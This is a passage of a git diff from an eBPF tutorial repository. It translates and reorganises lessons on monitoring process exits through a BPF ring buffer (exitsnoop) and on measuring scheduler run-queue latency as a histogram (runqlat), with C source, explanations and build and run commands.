+Whenever a BPF program needs to send collected data to user space for post-processing and logging, it typically uses the BPF perf buffer (perfbuf). Perfbuf is a collection of per-CPU circular buffers that allow efficient data exchange between the kernel and user space. It works well in practice, but it has two main drawbacks that have proven to be inconvenient: inefficient memory usage and event reordering. -为了解决这些问题,从Linux 5.8开始,BPF提供了一个新的BPF数据结构(BPF map)。BPF环形缓冲区(ringbuf)。它是一个多生产者、单消费者(MPSC)队列,可以同时在多个CPU上安全共享。 +To address these issues, starting from Linux 5.8, BPF introduces a new BPF data structure called BPF ring buffer. It is a multiple producer, single consumer (MPSC) queue that can be safely shared across multiple CPUs. -BPF ringbuf 支持来自 BPF perfbuf 的熟悉的功能: +The BPF ring buffer supports familiar features from BPF perf buffer: -- 变长的数据记录。 -- 能够通过内存映射区域有效地从用户空间读取数据,而不需要额外的内存拷贝和/或进入内核的系统调用。 -- 既支持epoll通知,又能以绝对最小的延迟进行忙环操作。 +- Variable-length data records. +- Efficient reading of data from user space through memory-mapped regions without additional memory copies and/or entering kernel system calls. +- Support for epoll notifications and busy loop operations with absolute minimal latency. -同时,BPF ringbuf解决了BPF perfbuf的以下问题: +At the same time, the BPF ring buffer solves the following problems of the BPF perf buffer: -- 内存开销。 -- 数据排序。 -- 浪费的工作和额外的数据复制。 +- Memory overhead. +- Data ordering. +- Unnecessary work and additional data copying. ## exitsnoop -本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件,并使用 ring buffer 向用户态打印输出。 +This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF and using the ring buffer to print output to user space. -使用 ring buffer 向用户态打印输出的步骤和 perf buffer 类似,首先需要定义一个头文件: +The steps for printing output to user space using the ring buffer are similar to perf buffer. First, a header file needs to be defined: -头文件:exitsnoop.h +Header File: exitsnoop.h ```c #ifndef __BOOTSTRAP_H @@ -52,7 +52,7 @@ struct event { #endif /* __BOOTSTRAP_H */ ``` -源文件:exitsnoop.bpf.c +Source File: exitsnoop.bpf.c ```c #include "vmlinux.h" @@ -106,23 +106,23 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) } ``` -这段代码展示了如何使用 exitsnoop 监控进程退出事件并使用 ring buffer 向用户态打印输出: +This code demonstrates how to monitor process exit events using exitsnoop and print output to user space using a ring buffer: -1. 首先,我们引入所需的头文件和 exitsnoop.h。 -2. 定义一个名为 "LICENSE" 的全局变量,内容为 "Dual BSD/GPL",这是 eBPF 程序的许可证要求。 -3. 定义一个名为 rb 的 BPF_MAP_TYPE_RINGBUF 类型的映射,它将用于将内核空间的数据传输到用户空间。指定 max_entries 为 256 * 1024,代表 ring buffer 的最大容量。 -4. 定义一个名为 handle_exit 的 eBPF 程序,它将在进程退出事件触发时执行。传入一个名为 ctx 的 trace_event_raw_sched_process_template 结构体指针作为参数。 -5. 使用 bpf_get_current_pid_tgid() 函数获取当前任务的 PID 和 TID。对于主线程,PID 和 TID 相同;对于子线程,它们是不同的。我们只关心进程(主线程)的退出,因此在 PID 和 TID 不同时返回 0,忽略子线程退出事件。 -6. 使用 bpf_ringbuf_reserve 函数为事件结构体 e 在 ring buffer 中预留空间。如果预留失败,返回 0。 -7. 使用 bpf_get_current_task() 函数获取当前任务的 task_struct 结构指针。 -8. 将进程相关信息填充到预留的事件结构体 e 中,包括进程持续时间、PID、PPID、退出代码以及进程名称。 -9. 最后,使用 bpf_ringbuf_submit 函数将填充好的事件结构体 e 提交到 ring buffer,之后在用户空间进行处理和输出。 +1. First, we include the required headers and exitsnoop.h. +2. We define a global variable named "LICENSE" with the content "Dual BSD/GPL", which is the license requirement for eBPF programs. +3. We define a mapping named rb of type BPF_MAP_TYPE_RINGBUF, which will be used to transfer data from kernel space to user space. We specify max_entries as 256 * 1024, representing the maximum capacity of the ring buffer. +4. We define an eBPF program named handle_exit, which will be executed when a process exit event is triggered. It takes a trace_event_raw_sched_process_template struct pointer named ctx as the parameter. +5. We use the bpf_get_current_pid_tgid() function to obtain the PID and TID of the current task. For the main thread, the PID and TID are the same; for child threads, they are different. Since we only care about the exit of the process (main thread), we return 0 if the PID and TID are different, ignoring the exit events of child threads. +6. We use the bpf_ringbuf_reserve function to reserve space for the event struct e in the ring buffer. If the reservation fails, we return 0. +7. We use the bpf_get_current_task() function to obtain a task_struct structure pointer for the current task. +8. We fill in the process-related information into the reserved event struct e, including the duration of the process, PID, PPID, exit code, and process name. +9. Finally, we use the bpf_ringbuf_submit function to submit the filled event struct e to the ring buffer, for further processing and output in user space. -这个示例展示了如何使用 exitsnoop 和 ring buffer 在 eBPF 程序中捕获进程退出事件并将相关信息传输到用户空间。这对于分析进程退出原因和监控系统行为非常有用。 +This example demonstrates how to capture process exit events using exitsnoop and a ring buffer in an eBPF program, and transfer relevant information to user space. This is useful for analyzing process exit reasons and monitoring system behavior. ## Compile and Run -eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its purpose is to simplify the development, build, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compiler toolchain and ecli runtime. We will use eunomia-bpf to compile and run this example. Compile: @@ -143,7 +143,7 @@ Run: ```console $ sudo ./ecli run package.json -TIME PID PPID EXIT_CODE DURATION_NS COMM +TIME PID PPID EXIT_CODE DURATION_NS COMM". 21:40:09 42050 42049 0 0 which 21:40:09 42049 3517 0 0 sh 21:40:09 42052 42051 0 0 ps @@ -155,8 +155,8 @@ TIME PID PPID EXIT_CODE DURATION_NS COMM 21:40:09 42059 42054 0 0 cat ``` -## 总结 +## Summary -本文介绍了如何使用 eunomia-bpf 开发一个简单的 BPF 程序,该程序可以监控 Linux 系统中的进程退出事件, 并将捕获的事件通过 ring buffer 发送给用户空间程序。在本文中,我们使用 eunomia-bpf 编译运行了这个例子。 +This article introduces how to develop a simple BPF program using eunomia-bpf that can monitor process exit events in a Linux system and send the captured events to user space programs via a ring buffer. In this article, we compiled and ran this example using eunomia-bpf. -为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档: 。此外,我们还为您提供了完整的教程和源代码,您可以在 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。 +To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf at: . Additionally, we provide a complete tutorial and source code for you to view and learn from at . We hope this tutorial helps you get started with eBPF development and provides useful references for your further learning and practice. diff --git a/src/8-exitsnoop/README.zh.md b/src/8-exitsnoop/README.zh.md new file mode 100644 index 0000000..fbb30a8 --- /dev/null +++ b/src/8-exitsnoop/README.zh.md @@ -0,0 +1,162 @@ +# eBPF 入门开发实践教程八:在 eBPF 中使用 exitsnoop 监控进程退出事件,使用 ring buffer 向用户态打印输出 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件。 + +## ring buffer + +现在有一个新的 BPF 数据结构可用,eBPF 环形缓冲区(ring buffer)。它解决了 BPF perf buffer(当今从内核向用户空间发送数据的事实上的标准)的内存效率和事件重排问题,同时达到或超过了它的性能。它既提供了与 perf buffer 兼容以方便迁移,又有新的保留/提交API,具有更好的可用性。另外,合成和真实世界的基准测试表明,在几乎所有的情况下,所以考虑将其作为从BPF程序向用户空间发送数据的默认选择。 + +### eBPF ringbuf vs eBPF perfbuf + +只要 BPF 程序需要将收集到的数据发送到用户空间进行后处理和记录,它通常会使用 BPF perf buffer(perfbuf)来实现。Perfbuf 是每个CPU循环缓冲区的集合,它允许在内核和用户空间之间有效地交换数据。它在实践中效果很好,但由于其按CPU设计,它有两个主要的缺点,在实践中被证明是不方便的:内存的低效使用和事件的重新排序。 + +为了解决这些问题,从Linux 5.8开始,BPF提供了一个新的BPF数据结构(BPF map)。BPF环形缓冲区(ringbuf)。它是一个多生产者、单消费者(MPSC)队列,可以同时在多个CPU上安全共享。 + +BPF ringbuf 支持来自 BPF perfbuf 的熟悉的功能: + +- 变长的数据记录。 +- 能够通过内存映射区域有效地从用户空间读取数据,而不需要额外的内存拷贝和/或进入内核的系统调用。 +- 既支持epoll通知,又能以绝对最小的延迟进行忙环操作。 + +同时,BPF ringbuf解决了BPF perfbuf的以下问题: + +- 内存开销。 +- 数据排序。 +- 浪费的工作和额外的数据复制。 + +## exitsnoop + +本文是 eBPF 入门开发实践教程的第八篇,在 eBPF 中使用 exitsnoop 监控进程退出事件,并使用 ring buffer 向用户态打印输出。 + +使用 ring buffer 向用户态打印输出的步骤和 perf buffer 类似,首先需要定义一个头文件: + +头文件:exitsnoop.h + +```c +#ifndef __BOOTSTRAP_H +#define __BOOTSTRAP_H + +#define TASK_COMM_LEN 16 +#define MAX_FILENAME_LEN 127 + +struct event { + int pid; + int ppid; + unsigned exit_code; + unsigned long long duration_ns; + char comm[TASK_COMM_LEN]; +}; + +#endif /* __BOOTSTRAP_H */ +``` + +源文件:exitsnoop.bpf.c + +```c +#include "vmlinux.h" +#include +#include +#include +#include "exitsnoop.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} rb SEC(".maps"); + +SEC("tp/sched/sched_process_exit") +int handle_exit(struct trace_event_raw_sched_process_template* ctx) +{ + struct task_struct *task; + struct event *e; + pid_t pid, tid; + u64 id, ts, *start_ts, start_time = 0; + + /* get PID and TID of exiting thread/process */ + id = bpf_get_current_pid_tgid(); + pid = id >> 32; + tid = (u32)id; + + /* ignore thread exits */ + if (pid != tid) + return 0; + + /* reserve sample from BPF ringbuf */ + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (!e) + return 0; + + /* fill out the sample with data */ + task = (struct task_struct *)bpf_get_current_task(); + start_time = BPF_CORE_READ(task, start_time); + + e->duration_ns = bpf_ktime_get_ns() - start_time; + e->pid = pid; + e->ppid = BPF_CORE_READ(task, real_parent, tgid); + e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; + bpf_get_current_comm(&e->comm, sizeof(e->comm)); + + /* send data to user-space for post-processing */ + bpf_ringbuf_submit(e, 0); + return 0; +} +``` + +这段代码展示了如何使用 exitsnoop 监控进程退出事件并使用 ring buffer 向用户态打印输出: + +1. 首先,我们引入所需的头文件和 exitsnoop.h。 +2. 定义一个名为 "LICENSE" 的全局变量,内容为 "Dual BSD/GPL",这是 eBPF 程序的许可证要求。 +3. 定义一个名为 rb 的 BPF_MAP_TYPE_RINGBUF 类型的映射,它将用于将内核空间的数据传输到用户空间。指定 max_entries 为 256 * 1024,代表 ring buffer 的最大容量。 +4. 定义一个名为 handle_exit 的 eBPF 程序,它将在进程退出事件触发时执行。传入一个名为 ctx 的 trace_event_raw_sched_process_template 结构体指针作为参数。 +5. 使用 bpf_get_current_pid_tgid() 函数获取当前任务的 PID 和 TID。对于主线程,PID 和 TID 相同;对于子线程,它们是不同的。我们只关心进程(主线程)的退出,因此在 PID 和 TID 不同时返回 0,忽略子线程退出事件。 +6. 使用 bpf_ringbuf_reserve 函数为事件结构体 e 在 ring buffer 中预留空间。如果预留失败,返回 0。 +7. 使用 bpf_get_current_task() 函数获取当前任务的 task_struct 结构指针。 +8. 将进程相关信息填充到预留的事件结构体 e 中,包括进程持续时间、PID、PPID、退出代码以及进程名称。 +9. 最后,使用 bpf_ringbuf_submit 函数将填充好的事件结构体 e 提交到 ring buffer,之后在用户空间进行处理和输出。 + +这个示例展示了如何使用 exitsnoop 和 ring buffer 在 eBPF 程序中捕获进程退出事件并将相关信息传输到用户空间。这对于分析进程退出原因和监控系统行为非常有用。 + +## Compile and Run + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +Compile: + +```shell +docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest +``` + +Or + +```console +$ ecc exitsnoop.bpf.c exitsnoop.h +Compiling bpf object... +Generating export types... +Packing ebpf object and config into package.json... +``` + +Run: + +```console +$ sudo ./ecli run package.json +TIME PID PPID EXIT_CODE DURATION_NS COMM +21:40:09 42050 42049 0 0 which +21:40:09 42049 3517 0 0 sh +21:40:09 42052 42051 0 0 ps +21:40:09 42051 3517 0 0 sh +21:40:09 42055 42054 0 0 sed +21:40:09 42056 42054 0 0 cat +21:40:09 42057 42054 0 0 cat +21:40:09 42058 42054 0 0 cat +21:40:09 42059 42054 0 0 cat +``` + +## 总结 + +本文介绍了如何使用 eunomia-bpf 开发一个简单的 BPF 程序,该程序可以监控 Linux 系统中的进程退出事件, 并将捕获的事件通过 ring buffer 发送给用户空间程序。在本文中,我们使用 eunomia-bpf 编译运行了这个例子。 + +为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档: 。此外,我们还为您提供了完整的教程和源代码,您可以在 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。 diff --git a/src/8-exitsnoop/README_en.md b/src/8-exitsnoop/README_en.md deleted file mode 100644 index 9983cbe..0000000 --- a/src/8-exitsnoop/README_en.md +++ /dev/null @@ -1,162 +0,0 @@ -# eBPF Tutorial by Example 8: Monitoring Process Exit Events, Output with Ring Buffer - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel. - -This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF. - -## Ring Buffer - -There is now a new BPF data structure available called the eBPF ring buffer. It solves the memory efficiency and event reordering issues of the BPF perf buffer, which is currently the de facto standard for sending data from the kernel to user space. It provides compatibility with perf buffer for easy migration while also introducing new reserved/commit APIs for improved usability. Additionally, synthetic and real-world benchmark tests have shown that in nearly all cases, the eBPF ring buffer should be the default choice for sending data from BPF programs to user space. - -### eBPF Ring Buffer vs eBPF Perf Buffer - -Whenever a BPF program needs to send collected data to user space for post-processing and logging, it typically uses the BPF perf buffer (perfbuf). Perfbuf is a collection of per-CPU circular buffers that allow efficient data exchange between the kernel and user space. It works well in practice, but it has two main drawbacks that have proven to be inconvenient: inefficient memory usage and event reordering. - -To address these issues, starting from Linux 5.8, BPF introduces a new BPF data structure called BPF ring buffer. It is a multiple producer, single consumer (MPSC) queue that can be safely shared across multiple CPUs. - -The BPF ring buffer supports familiar features from BPF perf buffer: - -- Variable-length data records. -- Efficient reading of data from user space through memory-mapped regions without additional memory copies and/or entering kernel system calls. -- Support for epoll notifications and busy loop operations with absolute minimal latency. - -At the same time, the BPF ring buffer solves the following problems of the BPF perf buffer: - -- Memory overhead. -- Data ordering. -- Unnecessary work and additional data copying. - -## exitsnoop - -This article is the eighth part of the eBPF Tutorial by Example, focusing on monitoring process exit events with eBPF and using the ring buffer to print output to user space. - -The steps for printing output to user space using the ring buffer are similar to perf buffer. First, a header file needs to be defined: - -Header File: exitsnoop.h - -```c -#ifndef __BOOTSTRAP_H -#define __BOOTSTRAP_H - -#define TASK_COMM_LEN 16 -#define MAX_FILENAME_LEN 127 - -struct event { - int pid; - int ppid; - unsigned exit_code; - unsigned long long duration_ns; - char comm[TASK_COMM_LEN]; -}; - -#endif /* __BOOTSTRAP_H */ -``` - -Source File: exitsnoop.bpf.c - -```c -#include "vmlinux.h" -#include -#include -#include -#include "exitsnoop.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} rb SEC(".maps"); - -SEC("tp/sched/sched_process_exit") -int handle_exit(struct trace_event_raw_sched_process_template* ctx) -{ - struct task_struct *task; - struct event *e; - pid_t pid, tid; - u64 id, ts, *start_ts, start_time = 0; - - /* get PID and TID of exiting thread/process */ - id = bpf_get_current_pid_tgid(); - pid = id >> 32; - tid = (u32)id; - - /* ignore thread exits */ - if (pid != tid) - return 0; - - /* reserve sample from BPF ringbuf */ - e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); - if (!e) - return 0; - - /* fill out the sample with data */ - task = (struct task_struct *)bpf_get_current_task(); - start_time = BPF_CORE_READ(task, start_time); - - e->duration_ns = bpf_ktime_get_ns() - start_time; - e->pid = pid; - e->ppid = BPF_CORE_READ(task, real_parent, tgid); - e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; - bpf_get_current_comm(&e->comm, sizeof(e->comm)); - - /* send data to user-space for post-processing */ - bpf_ringbuf_submit(e, 0); - return 0; -} -``` - -This code demonstrates how to monitor process exit events using exitsnoop and print output to user space using a ring buffer: - -1. First, we include the required headers and exitsnoop.h. -2. We define a global variable named "LICENSE" with the content "Dual BSD/GPL", which is the license requirement for eBPF programs. -3. We define a mapping named rb of type BPF_MAP_TYPE_RINGBUF, which will be used to transfer data from kernel space to user space. We specify max_entries as 256 * 1024, representing the maximum capacity of the ring buffer. -4. We define an eBPF program named handle_exit, which will be executed when a process exit event is triggered. It takes a trace_event_raw_sched_process_template struct pointer named ctx as the parameter. -5. We use the bpf_get_current_pid_tgid() function to obtain the PID and TID of the current task. For the main thread, the PID and TID are the same; for child threads, they are different. Since we only care about the exit of the process (main thread), we return 0 if the PID and TID are different, ignoring the exit events of child threads. -6. We use the bpf_ringbuf_reserve function to reserve space for the event struct e in the ring buffer. If the reservation fails, we return 0. -7. We use the bpf_get_current_task() function to obtain a task_struct structure pointer for the current task. -8. We fill in the process-related information into the reserved event struct e, including the duration of the process, PID, PPID, exit code, and process name. -9. Finally, we use the bpf_ringbuf_submit function to submit the filled event struct e to the ring buffer, for further processing and output in user space. - -This example demonstrates how to capture process exit events using exitsnoop and a ring buffer in an eBPF program, and transfer relevant information to user space. This is useful for analyzing process exit reasons and monitoring system behavior. - -## Compile and Run - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines with Wasm. Its purpose is to simplify the development, build, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compiler toolchain and ecli runtime. We will use eunomia-bpf to compile and run this example. - -Compile: - -```shell -docker run -it -v `pwd`/:/src/ ghcr.io/eunomia-bpf/ecc-`uname -m`:latest -``` - -Or - -```console -$ ecc exitsnoop.bpf.c exitsnoop.h -Compiling bpf object... -Generating export types... -Packing ebpf object and config into package.json... -``` - -Run: - -```console -$ sudo ./ecli run package.json -TIME PID PPID EXIT_CODE DURATION_NS COMM". -21:40:09 42050 42049 0 0 which -21:40:09 42049 3517 0 0 sh -21:40:09 42052 42051 0 0 ps -21:40:09 42051 3517 0 0 sh -21:40:09 42055 42054 0 0 sed -21:40:09 42056 42054 0 0 cat -21:40:09 42057 42054 0 0 cat -21:40:09 42058 42054 0 0 cat -21:40:09 42059 42054 0 0 cat -``` - -## Summary - -This article introduces how to develop a simple BPF program using eunomia-bpf that can monitor process exit events in a Linux system and send the captured events to user space programs via a ring buffer. In this article, we compiled and ran this example using eunomia-bpf. - -To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf at: . Additionally, we provide a complete tutorial and source code for you to view and learn from at . We hope this tutorial helps you get started with eBPF development and provides useful references for your further learning and practice. diff --git a/src/9-runqlat/README.md b/src/9-runqlat/README.md index 812b1f7..ffd3377 100755 --- a/src/9-runqlat/README.md +++ b/src/9-runqlat/README.md @@ -1,32 +1,32 @@ -# eBPF 入门开发实践教程九:捕获进程调度延迟,以直方图方式记录 +# eBPF Tutorial by Example 9: Capturing Scheduling Latency and Recording as Histogram -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime. -runqlat 是一个 eBPF 工具,用于分析 Linux 系统的调度性能。具体来说,runqlat 用于测量一个任务在被调度到 CPU 上运行之前在运行队列中等待的时间。这些信息对于识别性能瓶颈和提高 Linux 内核调度算法的整体效率非常有用。 +runqlat is an eBPF tool used for analyzing the scheduling performance of the Linux system. Specifically, runqlat is used to measure the time a task waits in the run queue before being scheduled to run on a CPU. This information is very useful for identifying performance bottlenecks and improving the overall efficiency of the Linux kernel scheduling algorithm. -## runqlat 原理 +## runqlat Principle -本教程是 eBPF 入门开发实践系列的第九部分,主题是 "捕获进程调度延迟"。在此,我们将介绍一个名为 runqlat 的程序,其作用是以直方图的形式记录进程调度延迟。 +This tutorial is the ninth part of the eBPF beginner's development series, with the topic "Capturing Process Scheduling Latency". Here, we will introduce a program called runqlat, which records process scheduling latency as a histogram. -Linux 操作系统使用进程来执行所有的系统和用户任务。这些进程可能被阻塞、杀死、运行,或者正在等待运行。处在后两种状态的进程数量决定了 CPU 运行队列的长度。 +The Linux operating system uses processes to execute all system and user tasks. These processes can be blocked, killed, running, or waiting to run. The number of processes in the latter two states determines the length of the CPU run queue. -进程有几种可能的状态,如: +Processes can have several possible states, such as: -- 可运行或正在运行 -- 可中断睡眠 -- 不可中断睡眠 -- 停止 -- 僵尸进程 +- Runnable or running +- Interruptible sleep +- Uninterruptible sleep +- Stopped +- Zombie process -等待资源或其他函数信号的进程会处在可中断或不可中断的睡眠状态:进程被置入睡眠状态,直到它需要的资源变得可用。然后,根据睡眠的类型,进程可以转移到可运行状态,或者保持睡眠。 +Processes waiting for resources or other function signals are in the interruptible or uninterruptible sleep state: the process is put to sleep until the resource it needs becomes available. Then, depending on the type of sleep, the process can transition to the runnable state or remain asleep. -即使进程拥有它需要的所有资源,它也不会立即开始运行。它会转移到可运行状态,与其他处在相同状态的进程一起排队。CPU可以在接下来的几秒钟或毫秒内执行这些进程。调度器为 CPU 排列进程,并决定下一个要执行的进程。 +Even when a process has all the resources it needs, it does not start running immediately. It transitions to the runnable state and is queued together with other processes in the same state. The CPU can execute these processes in the next few seconds or milliseconds. The scheduler arranges the processes for the CPU and determines the next process to run. -根据系统的硬件配置,这个可运行队列(称为 CPU 运行队列)的长度可以短也可以长。短的运行队列长度表示 CPU 没有被充分利用。另一方面,如果运行队列长,那么可能意味着 CPU 不够强大,无法执行所有的进程,或者 CPU 的核心数量不足。在理想的 CPU 利用率下,运行队列的长度将等于系统中的核心数量。 +Depending on the hardware configuration of the system, the length of this runnable queue (known as the CPU run queue) can be short or long. A short run queue length indicates that the CPU is not being fully utilized. On the other hand, if the run queue is long, it may mean that the CPU is not powerful enough to handle all the processes or that the number of CPU cores is insufficient. In an ideal CPU utilization, the length of the run queue will be equal to the number of cores in the system. -进程调度延迟,也被称为 "run queue latency",是衡量线程从变得可运行(例如,接收到中断,促使其处理更多工作)到实际在 CPU 上运行的时间。在 CPU 饱和的情况下,你可以想象线程必须等待其轮次。但在其他奇特的场景中,这也可能发生,而且在某些情况下,它可以通过调优减少,从而提高整个系统的性能。 +Process scheduling latency, also known as "run queue latency," is the time it takes for a thread to go from becoming runnable (e.g., receiving an interrupt that prompts it to do more work) to actually running on the CPU. In the case of CPU saturation, you can imagine that the thread has to wait for its turn. But in other peculiar scenarios, this can also happen, and in some cases, it can be reduced by tuning to improve the overall system performance. -我们将通过一个示例来阐述如何使用 runqlat 工具。这是一个负载非常重的系统: +We will illustrate how to use the runqlat tool through an example. This is a heavily loaded system: ```shell # runqlat @@ -44,24 +44,13 @@ Tracing run queue latency... Hit Ctrl-C to end. 256 -> 511 : 3 | | 512 -> 1023 : 5 | | 1024 -> 2047 : 27 |* | - 2048 -> 4095 : 30 |* | - 4096 -> 8191 : 20 | | - 8192 -> 16383 : 29 |* | - 16384 -> 32767 : 809 |****************************************| - 32768 -> 65535 : 64 |*** | ``` -在这个输出中,我们看到了一个双模分布,一个模在0到15微秒之间,另一个模在16到65毫秒之间。这些模式在分布(它仅仅是 "count" 列的视觉表示)中显示为尖峰。例如,读取一行:在追踪过程中,809个事件落入了16384到32767微秒的范围(16到32毫秒)。 - -在后续的教程中,我们将深入探讨如何利用 eBPF 对此类指标进行深度跟踪和分析,以更好地理解和优化系统性能。同时,我们也将学习更多关于 Linux 内核调度器、中断处理和 CPU 饱 - -runqlat 的实现利用了 eBPF 程序,它通过内核跟踪点和函数探针来测量进程在运行队列中的时间。当进程被排队时,trace_enqueue 函数会在一个映射中记录时间戳。当进程被调度到 CPU 上运行时,handle_switch 函数会检索时间戳,并计算当前时间与排队时间之间的时间差。这个差值(或 delta)被用于更新进程的直方图,该直方图记录运行队列延迟的分布。该直方图可用于分析 Linux 内核的调度性能。 - -## runqlat 代码实现 +## runqlat Code Implementation ### runqlat.bpf.c -首先我们需要编写一个源代码文件 runqlat.bpf.c: +First, we need to write a source code file `runqlat.bpf.c`: ```c // SPDX-License-Identifier: GPL-2.0 @@ -111,84 +100,84 @@ struct { static int trace_enqueue(u32 tgid, u32 pid) { - u64 ts; +u64 ts; - if (!pid) +if (!pid) return 0; - if (targ_tgid && targ_tgid != tgid) +if (targ_tgid && targ_tgid != tgid) return 0; - ts = bpf_ktime_get_ns(); - bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); - return 0; +ts = bpf_ktime_get_ns(); +bpf_map_update_elem(&start, &pid, &ts, BPF_ANY); +return 0; } static unsigned int pid_namespace(struct task_struct *task) { - struct pid *pid; - unsigned int level; - struct upid upid; - unsigned int inum; +struct pid *pid; +unsigned int level; +struct upid upid; +unsigned int inum; - /* get the pid namespace by following task_active_pid_ns(), - * pid->numbers[pid->level].ns - */ - pid = BPF_CORE_READ(task, thread_pid); - level = BPF_CORE_READ(pid, level); - bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); - inum = BPF_CORE_READ(upid.ns, ns.inum); +/* get the pid namespace by following task_active_pid_ns(), + * pid->numbers[pid->level].ns + */ +pid = BPF_CORE_READ(task, thread_pid); +level = BPF_CORE_READ(pid, level); +bpf_core_read(&upid, sizeof(upid), &pid->numbers[level]); +inum = BPF_CORE_READ(upid.ns, ns.inum); - return inum; +return inum; } static int handle_switch(bool preempt, struct task_struct *prev, struct task_struct *next) { - struct hist *histp; - u64 *tsp, slot; - u32 pid, hkey; - s64 delta; +struct hist *histp; +u64 *tsp, slot; +u32 pid, hkey; +s64 delta; - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) +if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) return 0; - if (get_task_state(prev) == TASK_RUNNING) +if (get_task_state(prev) == TASK_RUNNING) trace_enqueue(BPF_CORE_READ(prev, tgid), BPF_CORE_READ(prev, pid)); - pid = BPF_CORE_READ(next, pid); +pid = BPF_CORE_READ(next, pid); - tsp = bpf_map_lookup_elem(&start, &pid); - if (!tsp) +tsp = bpf_map_lookup_elem(&start, &pid); +if (!tsp) return 0; - delta = bpf_ktime_get_ns() - *tsp; - if (delta < 0) +delta = bpf_ktime_get_ns() - *tsp; +if (delta < 0) goto cleanup; - if (targ_per_process) +if (targ_per_process) hkey = BPF_CORE_READ(next, tgid); - else if (targ_per_thread) +else if (targ_per_thread) hkey = pid; - else if (targ_per_pidns) +else if (targ_per_pidns) hkey = pid_namespace(next); - else +else hkey = -1; - histp = bpf_map_lookup_or_try_init(&hists, &hkey, &zero); - if (!histp) +histp = bpf_map_lookup_or_try_init(&hists, &hkey, &zero); +if (!histp) goto cleanup; - if (!histp->comm[0]) +if (!histp->comm[0]) bpf_probe_read_kernel_str(&histp->comm, sizeof(histp->comm), next->comm); - if (targ_ms) +if (targ_ms) delta /= 1000000U; - else +else delta /= 1000U; - slot = log2l(delta); - if (slot >= MAX_SLOTS) +slot = log2l(delta); +if (slot >= MAX_SLOTS) slot = MAX_SLOTS - 1; - __sync_fetch_and_add(&histp->slots[slot], 1); +__sync_fetch_and_add(&histp->slots[slot], 1); cleanup: - bpf_map_delete_elem(&start, &pid); - return 0; +bpf_map_delete_elem(&start, &pid); +return 0; } SEC("raw_tp/sched_wakeup") @@ -218,7 +207,9 @@ int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct char LICENSE[] SEC("license") = "GPL"; ``` -这其中定义了一些常量和全局变量,用于过滤对应的追踪目标: +#### Constants and Global Variables + +The code defines several constants and volatile global variables used for filtering corresponding tracing targets. These variables include: ```c #define MAX_ENTRIES 10240 @@ -232,9 +223,13 @@ const volatile bool targ_ms = false; const volatile pid_t targ_tgid = 0; ``` -这些变量包括最大映射项数量、任务状态、过滤选项和目标选项。这些选项可以通过用户空间程序设置,以定制 eBPF 程序的行为。 +- `MAX_ENTRIES`: The maximum number of map entries. +- `TASK_RUNNING`: The task status value. +- `filter_cg`, `targ_per_process`, `targ_per_thread`, `targ_per_pidns`, `targ_ms`, `targ_tgid`: Boolean variables for filtering and target options. These options can be set by user-space programs to customize the behavior of the eBPF program. -接下来,定义了一些 eBPF 映射: +#### eBPF Maps + +The code defines several eBPF maps including: ```c struct { @@ -261,15 +256,15 @@ struct { } hists SEC(".maps"); ``` -这些映射包括: +- `cgroup_map`: A cgroup array map used for filtering cgroups. +- `start`: A hash map used to store timestamps when processes are enqueued. +- `hists`: A hash map used to store histogram data for recording process scheduling delays. -- cgroup_map 用于过滤 cgroup; -- start 用于存储进程入队时的时间戳; -- hists 用于存储直方图数据,记录进程调度延迟。 +#### Helper Functions -接下来是一些辅助函数: +The code includes two helper functions: -trace_enqueue 函数用于在进程入队时记录其时间戳: +- `trace_enqueue`: This 